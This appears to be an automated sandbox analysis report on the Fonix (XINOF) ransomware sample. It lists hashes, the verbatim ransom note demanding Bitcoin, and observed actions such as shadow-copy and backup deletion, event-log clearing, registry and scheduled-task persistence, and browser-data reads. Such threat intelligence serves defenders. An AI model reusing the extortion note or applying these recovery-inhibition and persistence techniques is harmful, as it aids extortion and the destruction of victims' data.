acfa59b94beebb0f9c4dd6a4c21586b9648808629624612c53d099df388eadd3

Analysis

max time kernel
1495s
max time network
1554s
platform
windows10_x64
resource
win10v20201028
submitted
30-10-2020 07:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XINOF4.2.1.exe
Size

379KB
MD5

b33099e43bc639110baab265f19eaab8
SHA1

17b5517634e881ab6e832476c6c9d8702941dde1
SHA256

acfa59b94beebb0f9c4dd6a4c21586b9648808629624612c53d099df388eadd3
SHA512

ce777ff2247a56c2b1e44eb3dd7affa423022bc81fb3058f8041fa64e63032771b9ae46499d3d0e62111968c665e104ee4e1fa3aefd858cc81df6e3037366b22

Score

10^/10

discovery evasion persistence ransomware spyware upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta

Ransom Note

All of your files have been encrypted! to DELETE all of your files... to avoid any problem READ THIS HELP CARFULLY All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email to [email protected] The crypter person username : satan your SYSTEM ID is : 8FBC4DDF You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Day) To contact or paying us After that, you have to Pay Double . in case of no answer in 6 hours email us at = [email protected] Attention! DO NOT pay any money before decrypting the test files. DO NOT trust any intermediary. they wont help you and you may be victim of scam. just email us , we help you in any steps. DO NOT reply to other emails. ONLY this two emails can help you. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. If the payment is not done after decryption, report the username to support email(along with evidence such as Transfer ID) What is our decryption guarantee? Before paying you can send us up to for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site.You have to register, click 'Buy bitcoins', and select the seller by payment method and price.https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ You only have LIMITED time to get back your files! if timer runs out and you dont pay us , all of files will be DELETED and yuor hard disk will be seriously DAMAGED. you will lose some of your data on day 2 in the timer. you can buy more time for pay. Just email us . THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) Regards-FonixTeam

Emails

[email protected]

Signatures

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1856 bcdedit.exe
200 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1392 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
1856	bcdedit.exe
200	bcdedit.exe

pid	process
1392	wbadmin.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\XINOF.exe	upx

Drops startup file 3 IoCs

Processes:

XINOF4.2.1.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key	XINOF4.2.1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Help.txt	XINOF4.2.1.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1984 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1984	icacls.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 32 IoCs

Processes:

XINOF4.2.1.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Links\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	XINOF4.2.1.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

XINOF4.2.1.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exe

description	ioc	process
File opened (read-only)	\??\M:	XINOF4.2.1.exe
File opened (read-only)	\??\A:	XINOF4.2.1.exe
File opened (read-only)	\??\G:	label.exe
File opened (read-only)	\??\T:	label.exe
File opened (read-only)	\??\P:	XINOF4.2.1.exe
File opened (read-only)	\??\Q:	XINOF4.2.1.exe
File opened (read-only)	\??\R:	XINOF4.2.1.exe
File opened (read-only)	\??\W:	XINOF4.2.1.exe
File opened (read-only)	\??\J:	label.exe
File opened (read-only)	\??\R:	label.exe
File opened (read-only)	\??\U:	label.exe
File opened (read-only)	\??\H:	XINOF4.2.1.exe
File opened (read-only)	\??\I:	XINOF4.2.1.exe
File opened (read-only)	\??\J:	XINOF4.2.1.exe
File opened (read-only)	\??\E:	label.exe
File opened (read-only)	\??\O:	label.exe
File opened (read-only)	\??\Q:	label.exe
File opened (read-only)	\??\V:	label.exe
File opened (read-only)	\??\K:	XINOF4.2.1.exe
File opened (read-only)	\??\S:	XINOF4.2.1.exe
File opened (read-only)	\??\N:	label.exe
File opened (read-only)	\??\Y:	label.exe
File opened (read-only)	\??\F:	XINOF4.2.1.exe
File opened (read-only)	\??\T:	XINOF4.2.1.exe
File opened (read-only)	\??\H:	label.exe
File opened (read-only)	\??\I:	label.exe
File opened (read-only)	\??\K:	label.exe
File opened (read-only)	\??\B:	label.exe
File opened (read-only)	\??\D:	label.exe
File opened (read-only)	\??\B:	XINOF4.2.1.exe
File opened (read-only)	\??\F:	label.exe
File opened (read-only)	\??\P:	label.exe
File opened (read-only)	\??\W:	label.exe
File opened (read-only)	\??\G:	XINOF4.2.1.exe
File opened (read-only)	\??\N:	XINOF4.2.1.exe
File opened (read-only)	\??\O:	XINOF4.2.1.exe
File opened (read-only)	\??\U:	XINOF4.2.1.exe
File opened (read-only)	\??\X:	XINOF4.2.1.exe
File opened (read-only)	\??\Y:	XINOF4.2.1.exe
File opened (read-only)	\??\M:	label.exe
File opened (read-only)	\??\S:	label.exe
File opened (read-only)	\??\Z:	label.exe
File opened (read-only)	\??\E:	XINOF4.2.1.exe
File opened (read-only)	\??\L:	XINOF4.2.1.exe
File opened (read-only)	\??\V:	XINOF4.2.1.exe
File opened (read-only)	\??\Z:	XINOF4.2.1.exe
File opened (read-only)	\??\L:	label.exe
File opened (read-only)	\??\A:	label.exe
File opened (read-only)	\??\X:	label.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

XINOF4.2.1.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\XINOFBG.jpg"	XINOF4.2.1.exe

Drops file in Program Files directory 64 IoCs

Processes:

XINOF4.2.1.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\TabTip32.exe.mui	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_hu.dll	XINOF4.2.1.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\Cpriv.key	XINOF4.2.1.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\assembly\GAC_MSIL\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\ui-strings.js	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\new_icons.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms	XINOF4.2.1.exe
File created	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\Cpriv.key	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-compat.jar	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar	XINOF4.2.1.exe
File created	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example3.Diagnostics\1.1.1\Diagnostics\Simple\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\How To Decrypt Files.hta	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\ui-strings.js	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSPPT.OLB	XINOF4.2.1.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\Cpriv.key	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js	XINOF4.2.1.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Document Parts\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\How To Decrypt Files.hta	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-ul-phn.xrm-ms	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ADAL.DLL	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-ae\How To Decrypt Files.hta	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close2x.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVManifest.dll	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-xstate-l2-1-0.dll	XINOF4.2.1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Examples\Calculator\Add-Numbers.Tests.ps1	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\ui-strings.js	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado27.tlb	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\glass.dll	XINOF4.2.1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ko\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\core_icons.png	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_OEM_Perp-ppd.xrm-ms	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	XINOF4.2.1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\Cpriv.key	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\Cpriv.key	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png	XINOF4.2.1.exe
File created	C:\Program Files\7-Zip\How To Decrypt Files.hta	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\EXCEL.VisualElementsManifest.xml	XINOF4.2.1.exe

Drops file in Windows directory 6 IoCs

Processes:

XINOF4.2.1.exewbadmin.exe

description	ioc	process
File created	C:\Windows\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Windows\Help.txt	XINOF4.2.1.exe
File created	C:\Windows\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1220 schtasks.exe
2820 schtasks.exe
3096 schtasks.exe
2808 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

360 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1856 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe

pid	process
1220	schtasks.exe
2820	schtasks.exe
3096	schtasks.exe
2808	schtasks.exe

pid	process
360	vssadmin.exe

pid	process
1856	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

XINOF4.2.1.exe

pid	process
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe
3160	XINOF4.2.1.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exeWMIC.exevssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3192	WMIC.exe
Token: SeSecurityPrivilege	3192	WMIC.exe
Token: SeTakeOwnershipPrivilege	3192	WMIC.exe
Token: SeLoadDriverPrivilege	3192	WMIC.exe
Token: SeSystemProfilePrivilege	3192	WMIC.exe
Token: SeSystemtimePrivilege	3192	WMIC.exe
Token: SeProfSingleProcessPrivilege	3192	WMIC.exe
Token: SeIncBasePriorityPrivilege	3192	WMIC.exe
Token: SeCreatePagefilePrivilege	3192	WMIC.exe
Token: SeBackupPrivilege	3192	WMIC.exe
Token: SeRestorePrivilege	3192	WMIC.exe
Token: SeShutdownPrivilege	3192	WMIC.exe
Token: SeDebugPrivilege	3192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3192	WMIC.exe
Token: SeRemoteShutdownPrivilege	3192	WMIC.exe
Token: SeUndockPrivilege	3192	WMIC.exe
Token: SeManageVolumePrivilege	3192	WMIC.exe
Token: 33	3192	WMIC.exe
Token: 34	3192	WMIC.exe
Token: 35	3192	WMIC.exe
Token: 36	3192	WMIC.exe
Token: SeBackupPrivilege	1640	vssvc.exe
Token: SeRestorePrivilege	1640	vssvc.exe
Token: SeAuditPrivilege	1640	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3192	WMIC.exe
Token: SeSecurityPrivilege	3192	WMIC.exe
Token: SeTakeOwnershipPrivilege	3192	WMIC.exe
Token: SeLoadDriverPrivilege	3192	WMIC.exe
Token: SeSystemProfilePrivilege	3192	WMIC.exe
Token: SeSystemtimePrivilege	3192	WMIC.exe
Token: SeProfSingleProcessPrivilege	3192	WMIC.exe
Token: SeIncBasePriorityPrivilege	3192	WMIC.exe
Token: SeCreatePagefilePrivilege	3192	WMIC.exe
Token: SeBackupPrivilege	3192	WMIC.exe
Token: SeRestorePrivilege	3192	WMIC.exe
Token: SeShutdownPrivilege	3192	WMIC.exe
Token: SeDebugPrivilege	3192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3192	WMIC.exe
Token: SeRemoteShutdownPrivilege	3192	WMIC.exe
Token: SeUndockPrivilege	3192	WMIC.exe
Token: SeManageVolumePrivilege	3192	WMIC.exe
Token: 33	3192	WMIC.exe
Token: 34	3192	WMIC.exe
Token: 35	3192	WMIC.exe
Token: 36	3192	WMIC.exe
Token: SeSecurityPrivilege	2940	wevtutil.exe
Token: SeBackupPrivilege	2940	wevtutil.exe
Token: SeSecurityPrivilege	1224	wevtutil.exe
Token: SeBackupPrivilege	1224	wevtutil.exe
Token: SeSecurityPrivilege	4000	wevtutil.exe
Token: SeBackupPrivilege	4000	wevtutil.exe
Token: SeSecurityPrivilege	3860	wevtutil.exe
Token: SeBackupPrivilege	3860	wevtutil.exe
Token: SeSecurityPrivilege	3724	wevtutil.exe
Token: SeBackupPrivilege	3724	wevtutil.exe
Token: SeSecurityPrivilege	200	wevtutil.exe
Token: SeBackupPrivilege	200	wevtutil.exe
Token: SeSecurityPrivilege	3764	wevtutil.exe
Token: SeBackupPrivilege	3764	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	276	wevtutil.exe
Token: SeBackupPrivilege	276	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

XINOF4.2.1.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3160 wrote to memory of 636	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 636	3160	XINOF4.2.1.exe	cmd.exe
PID 636 wrote to memory of 800	636	cmd.exe	chcp.com
PID 636 wrote to memory of 800	636	cmd.exe	chcp.com
PID 3160 wrote to memory of 1108	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 1108	3160	XINOF4.2.1.exe	cmd.exe
